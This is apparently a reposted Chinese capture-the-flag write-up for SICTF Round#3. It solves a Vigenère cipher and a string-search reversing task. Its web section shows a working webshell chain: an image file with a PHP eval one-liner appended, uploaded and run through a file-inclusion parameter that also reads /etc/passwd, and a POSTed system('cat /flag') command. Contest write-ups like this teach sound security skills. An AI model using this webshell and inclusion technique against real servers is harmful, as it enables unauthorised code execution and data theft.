1. Toy模板网首页
  2. > Toy博客

SICTF Round#3 の WP

9月前 作者:Fab1an 分类:Toy博客 阅读(24) 违法举报

这篇具有很好参考价值的文章主要介绍了SICTF Round#3 の WP。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

Misc

签到

SICTF Round#3 の WP,CTF,web安全,安全,网络,笔记,网络安全
SICTF{1f4ce05a-0fed-42dc-9510-6e76dff8ff53}

Crypto

[签到]Vigenere

SICTF Round#3 の WP,CTF,web安全,安全,网络,笔记,网络安全
附件内容:

Gn taj xirly gf Fxgjuakd, oe igywnd mt tegbs mnrxxlrivywd sngearbsw wakksre. Bs kpimj gf tank, it bx gur bslenmngn th jfdetagur mt ceei yze Ugnled Lystel tx Amxwaca gjmtrtq.

An taj wvegy gf tank nom xmccxjvinz, bw prhugse ts sllbffce hs lhe ytdlopnfg btxas wbyz Meqnuo: Tafl we lmsll ffce wtw logxyzer tsv madj heavj logxyzer. Pj khaeq yivLNUTF{4695vft9-fd68-4684-uj81-u6c1avg6uaft}j yenxwgus ynfanvnsl snuhorm, ffd ag zfdekxlanwnfg og tmr ptwl thty Eexbhg is mt jechsiuek yze lhxl tekwatokd an Nxb Eexbhg, Teqfk, anw Fjizhss. Thx iwtabqk of ljltlxrwnt tww leyy lo yhz.

Qou tww inlyjucmjv to bsxorf yze Pkjkidxsl [of Fjpich] tx thx ftovx nf thx ljeamjkt chsxidxsue al xgon tx at il hwrttnf thty lhekj oile gw an hzlbrxfc of pfj wimm lhe Nsatew Xlatxx snd lzygely lham yze Pkjkidxsl, on ank owg nfitbflivx, nfvimj Bapts lo ifrwdityw adajjenvj oita yzis iqsn; am yze strw tifj, gffxw lo mxiaatx gwtwxjf Jaiff anw tmrsxqnes.

Iqwasx hsll mt lhe tylenmngn oy yze Pkjkidxsl thty lhe kzlhlxxk emiqgymxsl of hzj suursrigjk nop txfekx lhe iwgspxhl of vtepeeqang Xsylagi lo mtpw pethw in t kww mhslhs.

用网站解密维吉尼亚密码(https://www.guballa.de/vigenere-solver)
SICTF Round#3 の WP,CTF,web安全,安全,网络,笔记,网络安全

On the first of February, we intend to begin unrestricted submarine warfare. In spite of this, it is our intention to endeavour to keep the United States of America neutral.

In the event of this not succeeding, we propose an alliance on the following basis with Mexico: That we shall make war together and make peace together. We shall givSICTF{4695cab9-fd68-4684-be81-c6c1acb6cafa}e generous financial support, and an understanding on our part that Mexico is to reconquer the lost territory in New Mexico, Texas, and Arizona. The details of settlement are left to you.

You are instructed to inform the President [of Mexico] of the above in the greatest confidence as soon as it is certain that there will be an outbreak of war with the United States and suggest that the President, on his own initiative, invite Japan to immediate adherence with this plan; at the same time, offer to mediate between Japan and ourselves.

Please call to the attention of the President that the ruthless employment of our submarines now offers the prospect of compelling England to make peace in a few months.


SICTF{4695cab9-fd68-4684-be81-c6c1acb6cafa}

Web

100%_upload

SICTF Round#3 の WP,CTF,web安全,安全,网络,笔记,网络安全
考查文件上传。但是需要搭配文件包含
这题使用使用 图片马 + 文件包含 绕过
SICTF Round#3 の WP,CTF,web安全,安全,网络,笔记,网络安全
发现file参数,测试发现存在文件包含漏洞,访问这里发现的

http://yuanshen.life:37548/index.php?file=/etc/passwd

SICTF Round#3 の WP,CTF,web安全,安全,网络,笔记,网络安全
SICTF Round#3 の WP,CTF,web安全,安全,网络,笔记,网络安全
SICTF Round#3 の WP,CTF,web安全,安全,网络,笔记,网络安全

我们先上传一个图片马,因为它检测后缀名和文件内容(不能包含“php”字母),用BurpSuite抓包
cmd使用 cmd /c “copy /b 1.png+1.php shell.png” 制作图片马,
报错解决:powershell Copy-Item:找不到接受参数“+”的位置参数 _大数据知识库
SICTF Round#3 の WP,CTF,web安全,安全,网络,笔记,网络安全
1.php 内容为一句话木马<?=eval($_POST[1]);?>
1.png 用画图创建出来就行

然后上传shell.png这个图片马,上传成功
SICTF Round#3 の WP,CTF,web安全,安全,网络,笔记,网络安全
用文件包含的漏洞访问这个地址,执行phpinfo()成功;

http://yuanshen.life:37548/index.php?file=uploads/shell.png

SICTF Round#3 の WP,CTF,web安全,安全,网络,笔记,网络安全
接下来直接查看根目录的flag就行了

POST发包:
1=system('cat /flag');

SICTF Round#3 の WP,CTF,web安全,安全,网络,笔记,网络安全
蚁剑也可以连接
SICTF Round#3 の WP,CTF,web安全,安全,网络,笔记,网络安全SICTF Round#3 の WP,CTF,web安全,安全,网络,笔记,网络安全
SICTF Round#3 の WP,CTF,web安全,安全,网络,笔记,网络安全

Reverse

[签到]Baby_C++

SICTF Round#3 の WP,CTF,web安全,安全,网络,笔记,网络安全
记事本打开直接搜索SICTF
SICTF Round#3 の WP,CTF,web安全,安全,网络,笔记,网络安全
不会逆向只会这样QAQ文章来源地址https://www.toymoban.com/news/detail-835517.html

到了这里,关于SICTF Round#3 の WP的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

分享到:
领支付宝红包 赞助服务器费用

相关文章

  • SICTF round#3 web

    SICTF round#3 web

    1.100%_upload url可以进行文件包含,但是flag被过滤 看一下源码 ph.,htaccess,?php被过滤 用短标签绕过 上传test.png文件 ?=`cat /flag`;再包含读取 2.EZ_SSRF 在__destruct处可以直接读取文件  public function __destruct()     {         get($this-url);     } 3.Not just unserialize 简单的pop链 然

    2024年02月20日
    浏览(29)
  • 2023年“羊城杯”网络安全大赛 决赛 AWDP [Break+Fix] Web方向题解wp 全

    2023年“羊城杯”网络安全大赛 决赛 AWDP [Break+Fix] Web方向题解wp 全

    终于迎来了我的第一百篇文章。 这次决赛赛制是AWDP。Break+Fix,其实就是CTF+Fix,Fix规则有点难崩。Break和Fix题目是一样的。 总结一下:败北,还是太菜了得继续修炼一下。 看到是SSTI,焚靖直接一把梭了。 瞎了,执行 ls / 时候flag文件在命令旁边没看见,find命令找了好久呜呜

    2024年02月07日
    浏览(47)
  • [CTF/网络安全] 攻防世界 Web_php_include 解题详析(php伪协议、data伪协议、file伪协议)

    [CTF/网络安全] 攻防世界 Web_php_include 解题详析(php伪协议、data伪协议、file伪协议)

    这段代码首先通过 show_source(__FILE__) 显示当前文件的源代码,然后通过 $_GET[\\\'hello\\\'] 显示 URL 参数中名为 hello 的值。 接下来,代码使用 $_GET[\\\'page\\\'] 获取 URL 参数中名为 “page” 的值,并进行字符串替换,将 php:// 替换为空字符串 这是为了防止通过 URL 参数加载本地文件或其他可

    2024年02月08日
    浏览(46)
  • Web 学习笔记 - 网络安全

    Web 学习笔记 - 网络安全

    目录 m前言 正文 XSS 攻击 简单示例 XSS 防御 CSRF  Web 安全方面的基本知识是有很必要的,未必就要深入理解。本文主要介绍常见的网络攻击类型,不作深入探讨。 网络攻击的形式种类繁多,从简单的网站敏感文件扫描、弱口令暴力破解,到 SQL 注入,再到复杂的网络劫持等,

    2023年04月24日
    浏览(45)
  • 网络安全B模块(笔记详解)- Web渗透测试

    网络安全B模块(笔记详解)- Web渗透测试

    1.通过渗透机Kali1.0对服务器场景PYsystem20192进行Web渗透测试(使用工具w3af的对目标Web服务器进行审计),在w3af的命令行界面下,使用命令列出所有用于审计的插件,将该操作使用的命令作为Flag值提交; 进入kali命令控制台中使用命令w3af_console进入w3af命令行模式,通过输入命令

    2024年01月25日
    浏览(50)
  • 网络安全B模块(笔记详解)- Web信息收集

    网络安全B模块(笔记详解)- Web信息收集

    1.通过Kali对服务器场景Linux进行Web扫描渗透测试(使用工具nikto,查看该命令的完整帮助文件),并将该操作使用命令中固定不变的字符串作为Flag提交; Flag:nikto -H 2.通过Kali对服务器场景Linux进行Web扫描渗透测试(使用工具nikto,扫描目标服务器8080端口,检测其开放状态),

    2024年01月20日
    浏览(57)
  • 2023年春秋杯网络安全联赛 春季赛 wp

    2023年春秋杯网络安全联赛 春季赛 wp

    第一部分求解一下pell函数得到x,y 直接使用二项式展开定理即可还原flag 可以直接将z表示出来然后就能求解key了 1day,一个SQL注入改管理员的密码。 payload: 然后计划任务执行读取flag或者反弹shell即可。 上来扫到了dowload目录,然后pyc反编译得到源码。 在numpy.loads存在pickle反序

    2024年02月13日
    浏览(42)
  • CTF网络安全大赛介绍

    CTF网络安全大赛介绍

    CTF竞赛模式分为以下三类: 一、解题模式(Jeopardy)在解题模式CTF赛制中,参赛队伍可以通过互联网或者现场网络参与,这种模式的CTF竞赛与ACM编程竞赛、信息学奥赛比较类似,以解决网络安全技术挑战题目的分值和时间来排名,通常用于在线选拔赛。题目主要包含逆向、漏

    2024年02月13日
    浏览(44)
  • CTF网络安全大赛详情

    CTF网络安全大赛详情

    网络安全已成为现代社会的一个关键挑战,随着互联网技术的飞速发展,从个人隐私保护到国家安全,网络安全的重要性日益突显。为了应对这一挑战,CTF(Capture The Flag,中文:夺旗赛)应运而生,成为全球网络安全领域中一种非常流行的信息安全竞赛形式。 CTF赛事起源与

    2024年04月26日
    浏览(87)
  • 网络安全CTF工具合集

    网络安全CTF工具合集

    各种在线工具以及工具整合 CTF资源库|CTF工具下载|CTF工具包|CTF工具集合 逆向工程: GDB – http://www.gnu.org/software/gdb/download/ IDA Pro – Download center Immunity Debugger – http://debugger.immunityinc.com/ OllyDbg – OllyDbg v1.10 radare2 – radare Hopper – Hopper - Download nm – unix/linux tool objdump – lin

    2024年02月06日
    浏览(46)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包